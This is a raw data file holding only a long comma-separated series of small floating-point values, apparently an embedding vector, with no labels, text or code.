0.006803722120821476, -0.0006464374018833041, 0.02245563454926014, -0.0027516530826687813, 0.022576291114091873, 0.044535890221595764, -0.009518507868051529, 0.0080907316878438, 0.03166579827666283, -0.013486786745488644, -0.004095639567822218, -0.047672975808382034, -0.0056976983323693275, 0.0010859143221750855, 0.005506657995283604, -0.03788634389638901, 0.006528892088681459, -0.04147924482822418, -0.013848758302628994, -0.02906496450304985, -0.020256994292140007, 0.0011613250244408846, 0.009994433261454105, 0.01804494671523571, -0.037350088357925415, 0.018554387614130974, -0.0369747094810009, -0.005486548412591219, -0.0037906451616436243, -0.014693358913064003, -0.000098191034339834, -0.03855666145682335, 0.018165603280067444, 0.050702810287475586, -0.005476493388414383, -0.00005985725510981865, -0.0006590058328583837, 0.014867641031742096, 0.01612783782184124, -0.005305562634021044, -0.031933922320604324, 0.0026494297198951244, 0.042927131056785583, 0.03630439192056656, -0.028796838596463203, 0.0058820354752242565, -0.022187506780028343, 0.012789657339453697, -0.0029007988050580025, 0.04314162954688072, 0.024050990119576454, 0.040540799498558044, -0.014438637532293797, -0.004209593404084444, 0.0010649668984115124, 0.012059010565280914, -0.010430139489471912, 0.016677498817443848, -0.009545320644974709, 0.02728191949427128, 0.0026242928579449654, -0.038181282579898834, 0.03472244367003441, -0.023916926234960556, -0.04166693240404129, 0.016918811947107315, -0.017253970727324486, -0.007380194962024689, 0.002840470289811492, -0.04094298928976059, -0.03166579827666283, -0.016261901706457138, 0.014974892139434814, 0.015779273584485054, -0.012675702571868896, -0.006445102393627167, -0.010570906102657318, -0.039655979722738266, -0.018554387614130974, 0.005278749857097864, -0.016865186393260956, 0.009431366808712482, 0.01199197955429554, -0.018996797502040863, 0.04660046845674515, 0.02898452617228031, 0.04335613176226616, -0.030378786846995354, -0.015537958592176437, -0.02986934594810009, -0.016503214836120605, 0.003205793211236596, -0.021919380873441696, 0.026557978242635727, 0.02126246877014637, -0.032577428966760635, 0.003458837978541851, -0.02128928154706955, 0.01804494671523571, 0.009042582474648952, 0.004983810242265463, 0.0009174970327876508, 0.0008085704175755382, 0.004977107048034668, 0.002052847295999527, -0.024600651115179062, -0.017977913841605186, -0.019425800070166588, -0.031075917184352875, -0.005191608797758818, 0.014465450309216976, 0.009458179585635662, -0.011361881159245968, -0.026772478595376015, -0.00048556120600551367, 0.04643959179520607, -0.00210982421413064, 0.017173532396554947, -0.0197073332965374, 0.040406737476587296, 0.0042498125694692135, -0.024828558787703514, 0.012293621897697449, -0.002605859190225601, -0.09395169466733932, 0.047512102872133255, -0.039575543254613876, -0.005412813276052475, -0.01646299660205841, 0.04643959179520607, -0.030298348516225815, -0.005473142024129629, -0.03933422639966011, 0.007896339520812035, 0.02911859005689621, -0.03528551012277603, -0.015672022476792336, 0.014532482251524925, 0.0348028838634491, 0.01371469534933567, -0.021557409316301346, -0.023166170343756676, -0.018339885398745537, 0.0065858690068125725, -0.03196073696017265, -0.05255289003252983, 0.0026092107873409986, 0.030405599623918533, -0.03791315481066704, -0.00843929685652256, 0.0024516861885786057, 0.002039440907537937, 0.042042311280965805, 0.0009644192177802324, 0.05121225491166115, -0.014827421866357327, 0.009860369376838207, 0.059416938573122025, 0.017897475510835648, -0.0010029624681919813, 0.002205344382673502, -0.00452464260160923, 0.023300234228372574, 0.00802369974553585, 0.0013892329297959805, -0.00949169509112835, 0.012038901448249817, -0.0002662417246028781, -0.0064652119763195515, -0.002486877841874957, 0.005758027080446482, 0.05016655847430229, 0.014398419298231602, -0.034078940749168396, -0.02037765085697174, 0.007480742875486612, -0.000311697629513219, 0.008962144143879414, -0.02201322466135025, 0.002401412231847644, 0.0386907234787941, -0.06649549305438995, -0.018969984725117683, -0.010973096825182438, -0.0027449498884379864, -0.009431366808712482, 0.03126360476016998, -0.0010280994465574622, -0.00686405086889863, -0.036518894135951996, 0.006347906310111284, -0.006860699038952589, -0.0552341565489769, 0.05673566833138466, 0.004139210097491741, -0.01687859371304512, -0.003148816293105483, -0.012789657339453697, -0.036518894135951996, -0.056253042072057724, -0.007158990483731031, -0.016610465943813324, 0.02346111088991165, 0.017776818946003914, 0.012119339779019356, 0.016650686040520668, -0.003225902793928981, 0.004343657288700342, 0.014572701416909695, 0.017227157950401306, 0.011375287547707558, 0.008942035026848316, -0.0017713138367980719, 0.0034554863814264536, -0.0019455964211374521, 0.002795223845168948, 0.0009074422414414585, 0.01163000799715519, -0.02398395910859108, -0.015175987035036087, -0.0019724091980606318, 0.023796269670128822, -0.002029386116191745, -0.006481969729065895, 0.02831420861184597, 0.014666546136140823, -0.010952986776828766, 0.02362198755145073, -0.005459735635668039, -0.019037015736103058, 0.023608580231666565, -0.05110500380396843, -0.01301756501197815, -0.050729624927043915, -0.04255175217986107, -0.003173953155055642, -0.01372810173779726, -0.011542866937816143, -0.03461519256234169, -0.01801813393831253, -0.01807175762951374, 0.037403713911771774, -0.00212323060259223, 0.010725079104304314, -0.012762844562530518, -0.0019690576009452343, 0.015350270085036755, 0.029225841164588928, -0.00596917700022459, -0.0020629018545150757, 0.035017382353544235, 0.03804721683263779, 0.011757368221879005, 0.010316185653209686, -0.023407485336065292, -0.0025874252896755934, 0.018500762060284615, -0.016556840389966965, 0.008184576407074928, 0.02004249207675457, -0.04080892726778984, -0.00667636189609766, -0.012193074449896812, -0.006904269568622112, -0.0032661217264831066, -0.03938785195350647, -0.038985662162303925, -0.020163148641586304, -0.011234520934522152, 0.012474607676267624, 0.011710446327924728, 0.014250949025154114, -0.0469222217798233, 0.010182121768593788, -0.002827063901349902, 0.01931854896247387, -0.02600831724703312, 0.019130859524011612, 0.007648322265595198, -0.0002509501064196229, -0.008794564753770828, 0.0019305142341181636, -0.0063914768397808075, -0.007386898156255484, 0.010349701158702374, 0.04003135859966278, 0.00018192834977526218, 0.009009066969156265, -0.006709877867251635, -0.0013506896793842316, -0.0030599990859627724, -0.012984049506485462, -0.002612562384456396, 0.05190938338637352, -0.00560720544308424, -0.007621509488672018, -0.044509079307317734, -0.01078540738672018, 0.014358200132846832, 0.03383762389421463, 0.008432593196630478, -0.0037705355789512396, 0.019559863954782486, 0.006998114287853241, 0.03142448142170906, 0.002481850329786539, 0.005784839391708374, 0.04408007487654686, 0.011784180998802185, 0.021798724308609962, 0.013124816119670868, 0.032765116542577744, -0.0014889426529407501, 0.03230930119752884, 0.011335068382322788, 0.011133972555398941, 0.01120100449770689, 0.027992457151412964, -0.002002573339268565, -0.007856120355427265, 0.0006426668842323124, -0.008620282635092735, 0.008472812362015247, -0.012179668061435223, 0.024667682126164436, 0.017870662733912468, 0.02761707827448845, 0.03466881811618805, -0.01165682077407837, -0.017441660165786743, -0.0007658376707695425, -0.0006581679335795343, 0.04735122621059418, -0.0025153663009405136, -0.014103478752076626, -0.0035794952418655157, -0.008513031527400017, -0.008419186808168888, 0.009169942699372768, 0.005721159279346466, -0.038261719048023224, -0.02198641188442707, -0.020833466202020645, 0.029601218178868294, -0.02098093554377556, -0.0012518177973106503, 0.00646186014637351, -0.033408623188734055, 0.018031539395451546, 0.0017629348440095782, 0.03633120656013489, 0.009913994930684566, 0.002111499896273017, 0.04322206974029541, -0.008700720965862274, 0.005664182361215353, -0.02553909458220005, 0.0027868447359651327, 0.029252653941512108, 0.012052307836711407, -0.04555477574467659, 0.028126521036028862, -0.004832988604903221, 0.0058351135812699795, 0.04810198023915291, 0.00100463826674968, 0.016865186393260956, 0.0028823651373386383, 0.02989615872502327, -0.0013389590894803405, 0.000408684165449813, -0.007413710933178663, 0.006411586422473192, -0.028662774711847305, 0.03619714081287384, -0.013661069795489311, 0.0032728249207139015, 0.02834102138876915, -0.014666546136140823, -0.009082801640033722, 0.018782295286655426, -0.01765616238117218, -0.02823377028107643, 0.028635961934924126, -0.021074781194329262, -0.038208093494176865, -0.038074031472206116, -0.02287123166024685, 0.060167696326971054, -0.0036063077859580517, 0.014545888639986515, -0.037403713911771774, 0.0384225957095623, -0.005409461911767721, -0.031933922320604324, 0.024252085015177727, -0.011495944112539291, 0.023139357566833496, -0.0008559115813113749, -0.011408803053200245, 0.015175987035036087, 0.015899930149316788, -0.03217523917555809, -0.017884070053696632, -0.007996886968612671, 0.007474039681255817, -0.004829637240618467, -0.013500193133950233, 0.0160473994910717, 0.031236793845891953, -0.007768979296088219, -0.013996228575706482, 0.012608671560883522, -0.014478856697678566, -0.004645300097763538, 0.009632461704313755, 0.014358200132846832, -0.008003590628504753, -0.006244007032364607, -0.007319866679608822, -0.008486218750476837, 0.0058183553628623486, 0.03292599320411682, -0.005841816775500774, 0.02439955435693264, -0.025887660682201385, 0.0030834602657705545, 0.006542298477143049, -0.01745506562292576, -0.028019269928336143, -0.010322888381779194, -0.005798245780169964, -0.01610102504491806, -0.0014855910558253527, 0.0009049285436049104, 0.007500852458178997, -0.01793769560754299, 0.003616362577304244, 0.004866504576057196, 0.009793338365852833, 0.02450680546462536, -0.025632940232753754, 0.01199197955429554, -0.010034652426838875, 0.030164284631609917, 0.035821765661239624, -0.005255288910120726, -0.03839578479528427, 0.019533051177859306, 0.0024919051211327314, -0.0015492711681872606, -0.01882251352071762, -0.023943739011883736, 0.008968847803771496, 0.006421640980988741, -0.009505101479589939, -0.0006853995728306472, 0.018648231402039528, -0.012206480838358402, 0.005667534191161394, 0.031209981068968773, -0.013862164691090584, -0.011442318558692932, 0.0052888048812747, 0.006579165812581778, 0.03300642967224121, -0.027362357825040817, 0.0026175896637141705, 0.0035560340620577335, 0.0023796269670128822, -0.006445102393627167, 0.0050106230191886425, 0.0005727024981752038, -0.020055897533893585, -0.017803631722927094, -0.0011705418583005667, -0.005184905603528023, 0.010135199874639511, 0.010014542378485203, -0.023890113458037376, 0.005332375410944223, 0.01257515512406826, -0.03397168964147568, -0.00770194735378027, 0.015175987035036087, 0.017079688608646393, -0.0320947989821434, 0.010637938044965267, 0.014492263086140156, -0.015980368480086327, 0.030512850731611252, 0.024158241227269173, -0.00917664635926485, 0.01200538594275713, -0.019586676731705666, -0.002103121019899845, 0.0015970313688740134, -0.007138880901038647, -0.003502408741042018, -0.008988956920802593, -0.01838010363280773, -0.013151627965271473, 0.011817696504294872, 0.02004249207675457, -0.004085585009306669, -0.07432480156421661, 0.006944488734006882, -0.011469131335616112, 0.05587766319513321, -0.013600741513073444, 0.03633120656013489, -0.012749438174068928, 0.026437319815158844, -0.020471494644880295, -0.009283896535634995, 0.014760389924049377, 0.01584630459547043, -0.003911302424967289, 0.017508691176772118, -0.002084687352180481, 0.00403195945546031, -0.007373491767793894, -0.0051312800496816635, -0.005741268862038851, -0.03946829214692116, 0.0025153663009405136, 0.020109523087739944, 0.0014462098479270935, -0.033354997634887695, 0.006622736342251301, 0.02112840674817562, -0.009726306423544884, -0.03230930119752884, 0.013848758302628994, -0.04003135859966278, 0.014532482251524925, 0.023836487904191017, -0.003219199599698186, 0.003760481020435691, -0.007165693677961826, -0.01685178093612194, -0.03394487500190735, 0.026611603796482086, -0.019854802638292313, 0.019908428192138672, -0.038905225694179535, 0.0014872668543830514, -0.016261901706457138, 0.02815333381295204, -0.012829876504838467, -0.0025472063571214676, 0.018058352172374725, 0.01409007329493761, 0.02312595210969448, -0.004682167433202267, -0.02126246877014637, 0.0037705355789512396, -0.0014596162363886833, -0.0014395067701116204, 0.0010356404818594456, -0.012595265172421932, 0.021637847647070885, -0.004779363516718149, -0.014773796312510967, 0.02287123166024685, 0.014197323471307755, 0.005148038268089294, 0.0011931650806218386, 0.0129505330696702, -0.015001704916357994, 0.007118771318346262, 0.024976028129458427, 0.013600741513073444, 0.01565861515700817, -0.03673339635133743, -0.015256425365805626, 0.02628985047340393, -0.01840691640973091, -0.027831580489873886, 0.04587652534246445, 0.010135199874639511, 0.01059101615101099, -0.005097764078527689, 0.012286919169127941, -0.015913335606455803, 0.017750006169080734, -0.011120566166937351, 0.010296076536178589, 0.0006812101346440613, 0.01887613907456398, -0.020525120198726654, 0.03536595031619072, -0.04070167616009712, 0.00017333989671897143, -0.050595562905073166, -0.02714785747230053, -0.00021596789883915335, -0.021409939974546432, -0.0013230390613898635, 0.00014097614621277899, 0.007420414127409458, 0.020109523087739944, 0.010456952266395092, 0.008070622570812702, -0.005486548412591219, 0.006897566374391317, -0.006944488734006882, -0.01993524096906185, -0.008445999585092068, -0.01695903204381466, 0.02984253317117691, -0.006622736342251301, 0.024332523345947266, -0.020082710310816765, -0.039736419916152954, 0.004588323179632425, -0.043597448617219925, -0.02567315846681595, 0.006978004705160856, -0.053196392953395844, -0.02512349747121334, 0.010999909602105618, 0.007112068124115467, -0.029708469286561012, -0.00009064996265806258, -0.0017847202252596617, -0.05512690916657448, -0.005396055523306131, -0.005861926358193159, 0.027831580489873886, -0.004430798348039389, -0.010101684369146824, -0.005690995138138533, 0.049844805151224136, 0.010450249537825584, 0.016690904274582863, 0.0048899659886956215, -0.022334977984428406, 0.0029879400972276926, -0.005573689471930265, -0.012219887226819992, 0.0010699941776692867, 0.00978663470596075, -0.008164466358721256, -0.029628030955791473, 0.006723284255713224, 0.01890295185148716, 0.02981572039425373, 0.004655354656279087, -0.05434934049844742, -0.010289372876286507, -0.018728669732809067, 0.005164796020835638, 0.004876559600234032, 0.04638596624135971, 0.011596491560339928, -0.005426219664514065, 0.013915790244936943, 0.013982822187244892, 0.013694585300981998, 0.014157104305922985, 0.03839578479528427, 0.0345347560942173, -0.013265582732856274, 0.017388034611940384, 0.007775682490319014, -0.033328182995319366, -0.006036208476871252, -0.03678702190518379, 0.015940148383378983, -0.010470358654856682, 0.06595923751592636, -0.027912018820643425, -0.01754891127347946, 0.010363107547163963, 0.03949510306119919, 0.025807222351431847, -0.03161217272281647, 0.0014671572716906667, 0.02173169143497944, -0.016811560839414597, 0.00003388245386304334, -0.006237303838133812, -0.025807222351431847, 0.0005144686438143253, 0.017481878399848938, -0.0025807220954447985, -0.005181553773581982, 0.00043109789839945734, 0.013372832909226418, 0.014130291528999805, -0.028662774711847305, -0.00010850763646885753, -0.013969415798783302, 0.0033415325451642275, -0.010919471271336079, -0.0003144207876175642, 0.03287236765027046, -0.004048717208206654, 0.01602058671414852, -0.0386907234787941, -0.033328182995319366, -0.000954364484641701, -0.019801177084445953, -0.005741268862038851, -0.00849292241036892, -0.017776818946003914, 0.03450794145464897, -0.017951101064682007, -0.04705628380179405, 0.0014395067701116204, 0.0011596492258831859, 0.02509668469429016, 0.024144833907485008, -0.027965644374489784, -0.01851416751742363, 0.03177304565906525, 0.020203368738293648, -0.026544570922851562, 0.006173623725771904, -0.006233952473849058, 0.002654456999152899, -0.014264355413615704, -0.02981572039425373, -0.024185054004192352, 0.03627758100628853, 0.007453930098563433, 0.02245563454926014, -0.008318639360368252, -0.002652781317010522, -0.02281760610640049, 0.007755572907626629, 0.0004185294674243778, -0.02009611763060093, 0.039709605276584625, -0.019090641289949417, 0.015175987035036087, -0.015470926649868488, 0.008238201960921288, 0.014934672974050045, -0.006059669889509678, -0.0027131098322570324, 0.03327455744147301, 0.005396055523306131, 0.01895657740533352, -0.041345179080963135, 0.047485288232564926, -0.0032409848645329475, -0.0009970972314476967, 0.005342429969459772, 0.017669567838311195, -0.03780590370297432, -0.00916323997080326, -0.00703833345323801, -0.01301756501197815, -0.007822604849934578, 0.00982685387134552, -0.008519735187292099, -0.00579489441588521, -0.01124122366309166, -0.019787771627306938, 0.0513463169336319, 0.011133972555398941, -0.0133795365691185, 0.015015111304819584, -0.009565429762005806, 0.00030792708275839686, 0.0001891552092274651, 0.00002486196899553761, -0.014827421866357327, 0.020605558529496193, 0.054617464542388916, -0.00014736510638613254, -0.012756140902638435, 0.011006612330675125, 0.004796121269464493, 0.006760151591151953, 0.021007748320698738, -0.004950294271111488, 0.0030331865418702364, 0.033435434103012085, 0.013091299682855606, 0.013795132748782635, 0.026571383699774742, 0.018420323729515076, 0.0011562976287677884, -0.006052966695278883, -0.01540389470756054, 0.016717717051506042, -0.011569678783416748, 0.009129723533987999, -0.0027600321918725967, 0.03633120656013489, 0.005345781799405813, -0.05209707096219063, -0.009833556599915028, -0.01745506562292576, 0.021436752751469612, 0.021222250536084175, 0.012715921737253666, -0.009672680869698524, 0.007909745909273624, -0.012668999843299389, -0.002367896493524313, 0.028635961934924126, -0.008318639360368252, 0.0029628032352775335, 0.0033264504745602608, 0.013252176344394684, -0.009619055315852165, 0.014934672974050045, -0.004028608091175556, -0.01796450838446617, -0.03558044880628586, 0.0015040248399600387, -0.010624531656503677, -0.00034961244091391563, -0.02393033355474472, 0.004430798348039389, 0.015551364980638027, 0.0012451147194951773, 0.0188493262976408, 0.010048058815300465, 0.009525210596621037, 0.00038668938213959336, -0.030191097408533096, 0.007675135042518377, 0.0019238110398873687, 0.02764389105141163, -0.006297632586210966, 0.010456952266395092, 0.005007271189242601, -0.00540611008182168, -0.006729987449944019, -0.01760253682732582, 0.02112840674817562, -0.01848735474050045, -0.006753448396921158, 0.003747074631974101, -0.00469892518594861, 0.0009309033630415797, -0.005727862473577261, -0.015162580646574497, -0.009082801640033722, 0.006471915170550346, -0.014720171689987183, -0.035044196993112564, 0.02014974318444729, 0.017884070053696632, 0.024855371564626694, 0.03367674723267555, 0.0042498125694692135, 0.007246131543070078, -0.006944488734006882, -0.0031840079464018345, -0.03432025387883186, 0.024453179910779, 0.019559863954782486, 0.005134631879627705, 0.006096537224948406, -0.0009627434192225337, -0.003281204029917717, 0.009987729601562023, 0.023823082447052002, 0.003954872954636812, 0.0209273099899292, 0.014438637532293797, -0.0029309631790965796, 0.007427117321640253, 0.0023276773281395435, 0.010570906102657318, 0.024989435449242592, -0.004042014013975859, -0.010885955765843391, -0.013902383856475353, -0.00801029335707426, 0.012219887226819992, -0.016141245141625404, 0.002872310345992446, -0.02486877702176571, 0.02242882177233696, -0.014197323471307755, 0.011107159778475761, -0.005409461911767721, -0.008110840804874897, 0.015672022476792336, 0.0017612591618672013, 0.011020018719136715, -0.019305143505334854, 0.016288714483380318, -0.019331954419612885, 0.005744620691984892, -0.006073076277971268, -0.015363676473498344, -0.023192983120679855, 0.04324888065457344, -0.003219199599698186, 0.003804051550105214, -0.01687859371304512, -0.015149174258112907, -0.023085733875632286, 0.00105491210706532, 0.03828853368759155, -0.01407666690647602, 0.0005597150884568691, 0.0005882035475224257, 0.0005186581402085721, -0.0034119158517569304, -0.02984253317117691, 0.0067635029554367065, 0.0050743031315505505, 0.015296644531190395, 0.013875571079552174, -0.006951191928237677, 0.009277193807065487, -0.053813084959983826, 0.015243018977344036, 0.0003508692898321897, 0.014519075863063335, 0.004377172794193029, -0.002748301485553384, 0.03292599320411682, -0.0039984434843063354, 0.026879729703068733, 0.013278989121317863, -0.0015903281746432185, 0.023796269670128822, -0.037296462804079056, -0.016664091497659683, 0.0041928356513381, 0.026557978242635727, -0.0011680282186716795, 0.019948648288846016, -0.007822604849934578, -0.002726516220718622, 0.00511452229693532, 0.006666306871920824, -0.03053966350853443, -0.013902383856475353, -0.01378172729164362, -0.010101684369146824, 0.008365562185645103, 0.015028517693281174, -0.008352155797183514, 0.010356404818594456, 0.002828739583492279, 0.0004981296369805932, 0.018916359171271324, -0.013238769955933094, -0.002419845899567008, -0.003609659383073449, 0.018782295286655426, 0.01654343493282795, 0.003787293564528227, 0.010932877659797668, 0.011596491560339928, -0.0006275846972130239, 0.011596491560339928, -0.009746415540575981, -0.038905225694179535, -0.029440343379974365, -0.020136335864663124, -0.0433025062084198, 0.0053826491348445415, -0.019023608416318893, -0.0007046711980365217, 0.015832899138331413, -0.009283896535634995, 0.010503874160349369, -0.01820582151412964, -0.008586766198277473, 0.002563964342698455, 0.005727862473577261, -0.0017796928295865655, 0.0022707004100084305, -0.02087368629872799, -0.01643618382513523, 0.045179396867752075, 0.026276445016264915, 0.0022086959797888994, 0.013956009410321712, 0.007252834737300873, -0.004333602264523506, 0.019854802638292313, -0.030512850731611252, 0.005369242746382952, -0.014572701416909695, 0.027134450152516365, -0.020364243537187576, -0.003086811862885952, 0.02844827249646187, 0.012467904947698116, 0.017897475510835648, 0.013862164691090584, 0.016369152814149857, 0.018742075189948082, 0.0050743031315505505, 0.02673226036131382, 0.02442636713385582, -0.001531675341539085, -0.008754345588386059, 0.019533051177859306, 0.034266628324985504, -0.017897475510835648, -0.022589698433876038, -0.01262878067791462, -0.048396918922662735, -0.018313072621822357, 0.02118203230202198, 0.009913994930684566, 0.04228362441062927, 0.03855666145682335, 0.015859710052609444, 0.0035996048245579004, 0.012159558944404125, -0.034078940749168396, -0.014693358913064003, -0.007306460291147232, -0.0006753448396921158, -0.008224795572459698, 0.03791315481066704, -0.011368583887815475, 0.002853876445442438, 0.02245563454926014, 0.014586107805371284, -0.023916926234960556, -0.02481515146791935, -0.007407007738947868, 0.0083856713026762, -0.003824161132797599, 0.018085164949297905, -0.036438457667827606, -0.01687859371304512, 0.035848576575517654, -0.02909177727997303, 0.013835351914167404, 0.0251771230250597, -0.02447999268770218, 0.03080778941512108, -0.0005362539668567479, 0.025579314678907394, -0.0057613784447312355, -0.030486037954688072, -0.027912018820643425, -0.01773660071194172, 0.004343657288700342, -0.003289582906290889, 0.001826615072786808, -0.006626088172197342, -0.001219139900058508, -0.009987729601562023, -0.007815901190042496, 0.00023419216449838132, 0.002071280963718891, -0.006636142730712891, 0.022267945110797882, 0.011060237884521484, -0.00341023993678391, 0.009927401319146156, -0.005412813276052475, 0.02276398055255413, 0.01929173618555069, 0.018366698175668716, 0.014867641031742096, -0.007943261414766312, 0.03702833503484726, -0.014948079362511635, 0.005097764078527689, 0.017253970727324486, -0.017884070053696632, 0.010309481993317604, -0.006311038974672556, 0.0040084985084831715, -0.0251771230250597, 0.016503214836120605, 0.02134290710091591, -0.0197073332965374, -0.02209366299211979, 0.005935661029070616, -0.001338121248409152, 0.00452464260160923, 0.007534367963671684, 0.009243677370250225, 0.00022371845261659473, 0.003589550033211708, -0.015604990534484386, -0.004950294271111488, 0.02750982902944088, -0.051534004509449005, 0.024721307680010796, -0.019197892397642136, 0.000541281362529844, 0.018473949283361435, -0.010416733101010323, -0.00024508481146767735, -0.007474039681255817, 0.018420323729515076, 0.010845736600458622, 0.02906496450304985, -0.013258879072964191, -0.00527539849281311, -0.007004817482084036, 0.02556590735912323, -0.017750006169080734, 0.02082006074488163, 0.001164676621556282, -0.002525421092286706, -0.005871980916708708, 0.004477720707654953, 0.012286919169127941, -0.0074673364870250225, 0.014532482251524925, 0.010074871592223644, -0.014840828254818916, 0.02756345458328724, -0.02759026549756527, 0.0033683450892567635, -0.021798724308609962, 0.006351257674396038, 0.010182121768593788, 0.008352155797183514, -0.007205912843346596, 0.0003856420225929469, -0.0032543912529945374, -0.027912018820643425, -0.012447794899344444, -0.020498307421803474, -0.007876230403780937, 0.015256425365805626, 0.005731214303523302, 0.03375718742609024, 0.01817900873720646, -0.016261901706457138, -0.005161444190889597, 0.023340454325079918, -0.02240200899541378, -0.011087050661444664, 0.013433162122964859, -0.010611125268042088, 0.00939785037189722, 0.014814015477895737, -0.0123405447229743, 0.009981026872992516, -0.0020813357550650835, -0.003452134784311056, -0.033328182995319366, 0.003951521590352058, -0.03273830562829971, -0.022884637117385864, 0.006341203115880489, 0.0011454049963504076, 0.020618963986635208, 0.007205912843346596, -0.010993205942213535, 0.016194868832826614, -0.012742734514176846, 0.0017294189892709255, 0.01998886652290821, 0.017200345173478127, 0.013158331625163555, -0.028716400265693665, -0.005493251606822014, -0.028770025819540024, -0.017615942284464836, 0.009558727033436298, -0.013332613743841648, -0.003068378195166588, -0.011442318558692932, -0.013051080517470837, 0.00687745725736022, 0.006176975555717945, 0.0048162308521568775, -0.04308800771832466, -0.005871980916708708, 0.010611125268042088, 0.007487446069717407, -0.000373283022781834, -0.010342998430132866, 0.0002563964226283133, -0.0006954543641768396, 0.02501624822616577, 0.01571224071085453, 0.016637278720736504, 0.005610557273030281, -0.005985934752970934, 0.017307596281170845, 0.014840828254818916, -0.0030432413332164288, -0.005530118942260742, -0.010061465203762054, 0.032523803412914276, -0.005734565667808056, -0.00682047987356782, 0.022442229092121124, 0.011851212941110134, -0.003011401044204831, 0.018393510952591896, -0.0197073332965374, -0.014277761802077293, -0.038985662162303925, -0.011764070950448513, 0.002079659840092063, 0.016918811947107315, -0.003797348355874419, 0.0033180713653564453, 0.012823172844946384, 0.002614238066598773, 0.0006041235756129026, -0.033301372081041336, -0.0034119158517569304, 0.009739712812006474, 0.012374060228466988, -0.0018953225808218122, -0.007132177706807852, 0.012400873005390167, -0.006776909343898296, -0.019827989861369133, -0.012293621897697449, -0.01965370774269104, -0.0002463416603859514, -0.01370128896087408, -0.026852916926145554, 0.01687859371304512, -0.007762276101857424, -0.00650207931175828, 0.024721307680010796, 0.0022790792863816023, -0.013185144402086735, 0.01734781637787819, 0.006022802088409662, 0.009223568253219128, 0.0049536461010575294, 0.002267348812893033, 0.004618487320840359, 0.013513599522411823, -0.0020746325608342886, 0.005727862473577261, -0.016503214836120605, -0.005935661029070616, -0.0034923539496958256, -0.002173504326492548, -0.001883591990917921, 0.02914540283381939, -0.0031404371839016676, 0.0038844896480441093, 0.04625190421938896, -0.010671453550457954, -0.028662774711847305, -0.007634915877133608, 0.008586766198277473, 0.0070852553471922874, -0.02393033355474472, 0.018608013167977333, 0.005828410387039185, 0.011898134835064411, -0.003472244367003441, -0.016221681609749794, 0.013218659907579422, 0.013272285461425781, -0.005868629086762667, -0.0009024148457683623, 0.017522098496556282, -0.010952986776828766, 0.015645209699869156, -0.02828739583492279, -0.009310709312558174, -0.02195959910750389, -0.019197892397642136, 0.020994342863559723, 0.007132177706807852, 0.031853485852479935, -0.005030732601881027, -0.018782295286655426, 0.02079324796795845, 0.006656252313405275, 0.020203368738293648, -0.03474925830960274, 0.007299757096916437, 0.043490197509527206, 0.011281442828476429, 0.02486877702176571, -0.005798245780169964, 0.03925378993153572, 0.018111977726221085, 0.00247011985629797, -0.025337999686598778, 0.008533141575753689, 0.008700720965862274, -0.029333092272281647, 0.02525756135582924, 0.0015819491818547249, -0.01124122366309166, 0.014385012909770012, 0.011006612330675125, -0.008633689023554325, 0.012307028286159039, 0.028555523604154587, -0.005939012859016657, -0.008204685524106026, 0.002339407801628113, 0.014371606521308422, -0.0011043479898944497, -0.011911541223526001, 0.0007700271671637893, -0.0028153331950306892, 0.01079881377518177, 0.02212047576904297, 0.013238769955933094, 0.011542866937816143, 0.020685996860265732, -0.013299098238348961, 0.020270399749279022, -0.00047341169556602836, -0.009954214096069336, 0.014720171689987183, -0.024453179910779, -0.011911541223526001, -0.0034923539496958256, -0.015444113872945309, 0.0011102132266387343, 0.004802824463695288, 0.007487446069717407, -0.0071522872895002365, -0.0021450158674269915, 0.018393510952591896, 0.00442074378952384, 0.008640391752123833, -0.002448334591463208, -0.003760481020435691, 0.018661638721823692, 0.009940807707607746, -0.003988388925790787, 0.003073405474424362, 0.016918811947107315, 0.017870662733912468, 0.010296076536178589, 0.014572701416909695, 0.0017243915935978293, 0.006374719087034464, -0.007889636792242527, 0.013862164691090584, -0.02331364154815674, 0.01823263429105282, 0.01581949181854725, -0.006016099359840155, 0.008003590628504753, 0.018272854387760162, -0.01374150812625885, 0.009753119200468063, 0.011697039939463139, 0.0030583234038203955, 0.0064484537579119205, 0.004786066710948944, 0.01801813393831253, -0.005979231558740139, -0.00945147592574358, 0.00916323997080326, -0.00289074401371181, -0.001059101545251906, 0.016369152814149857, 0.00048179065925069153, 0.009458179585635662, 0.009981026872992516, 0.010416733101010323, 0.004786066710948944, -0.018728669732809067, 0.008144357241690159, -0.01610102504491806, -0.01776341162621975, 0.02004249207675457, 0.00872753281146288, -0.01232713833451271, -0.01262878067791462, -0.023769456893205643, 0.009096208028495312, -0.00988047942519188, -0.005050842184573412, -0.011361881159245968, 0.015296644531190395, 0.004688870627433062, -0.011247927322983742, -0.00299129169434309, -0.021771911531686783, -0.012494717724621296, 0.004078881815075874, 0.016556840389966965, -0.008405780419707298, 0.016757937148213387, -0.017146719619631767, 0.0016908757388591766, -0.031746234744787216, 0.00469892518594861, 0.0026427265256643295, -0.0004910075222142041, -0.012863392010331154, -0.01374150812625885, -0.019278330728411674, -0.014317980967462063, 0.010369811207056046, -0.0021064726170152426, -0.017106501385569572, -0.0024047638289630413, -0.006699822843074799, -0.009927401319146156, 0.01335272379219532, 0.00032531344913877547, 0.00003275652852607891, -0.006609329953789711, 0.009270490147173405, -0.005060896743088961, -0.01078540738672018, 0.004142561927437782, 0.023192983120679855, 0.0006447616033256054, -0.005238530691713095, -0.002230481244623661, 0.03169260919094086, -0.023394079878926277, -0.012206480838358402, 0.0017428253777325153, 0.011884728446602821, -0.026303255930542946, 0.008486218750476837, -0.009679383598268032, 0.010329592041671276, -0.022200914099812508, 0.00041559681994840503, 0.01378172729164362, 0.002118203090503812, 0.021691473200917244, 0.01364095974713564, -0.013292395509779453, 0.009639165364205837, -0.025029653683304787, -0.02714785747230053, 0.008875003084540367, -0.03515144810080528, -0.011348474770784378, -0.011851212941110134, 0.016275307163596153, -0.0032962861005216837, -0.020913904532790184, -0.022911449894309044, -0.008265013806521893, 0.01732100360095501, -0.012809766456484795, 0.006870754063129425, 0.011006612330675125, 0.010510577820241451, 0.0005014812340959907, -0.004098991397768259, -0.008211389183998108, -0.009344225749373436, -0.0008789537823759019, 0.01620827615261078, 0.006830534897744656, 0.016114432364702225, -0.020565340295433998, -0.020283805206418037, 0.02826058305799961, -0.04542070999741554, 0.005516712553799152, -0.005841816775500774, 0.015068735927343369, 0.0073466794565320015, 0.020833466202020645, 0.0015903281746432185, 0.008908518590033054, -0.03295280784368515, 0.009619055315852165, -0.00670317467302084, 0.010182121768593788, 0.002892419695854187, -0.005429571494460106, 0.008734236471354961, 0.008204685524106026, -0.0026795940939337015, 0.007581290323287249, -0.004776011686772108, 